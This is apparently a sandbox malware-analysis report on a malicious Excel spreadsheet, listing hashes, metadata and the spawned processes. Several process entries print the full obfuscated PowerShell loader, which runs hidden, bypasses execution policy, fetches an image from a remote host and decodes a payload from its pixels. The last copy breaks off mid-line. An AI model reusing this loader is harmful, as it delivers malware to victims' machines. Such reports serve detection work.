File name: | doc_SPA_(25)_(2019-03-18 n._776).xls |
Full analysis: | https://app.any.run/tasks/6cd6b43d-b6b8-4ed4-a340-9dae0a23ff6c |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 10:31:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: copy; utente, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 7 12:12:20 2019, Last Saved Time/Date: Mon Mar 11 08:22:01 2019, Security: 0 |
MD5: | E10595514FBD9225D4D3BB01470BF1E1 |
SHA1: | 5E7A99894AC4FBA1E1755F076A4ED3A8B4706304 |
SHA256: | B1A0CC703BED0F205830881B98CC4803D8B6E37F5918B231CBE91F4CC7E16547 |
SSDEEP: | 1536:wn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAC:wn1DN3aM+UKccCEW8yjJTdrBX/3t4k3q |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Author: | copy; utente |
---|---|
Software: | Microsoft Excel |
CreateDate: | 2019:03:07 12:12:20 |
ModifyDate: | 2019:03:11 08:22:01 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Microsoft |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | 2019'marzo |
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2952 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2644 | cmd /cCMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(^&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(^&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(^&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(^&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(^&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(^&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(^&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( ^& "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3072 | CMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( & "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3264 | CMd /C %trs% | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3472 | PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2848 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lcupnu2x.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
476 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6678.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6677.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3864 | cmd /cCMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(^&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(^&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(^&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(^&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(^&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(^&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA 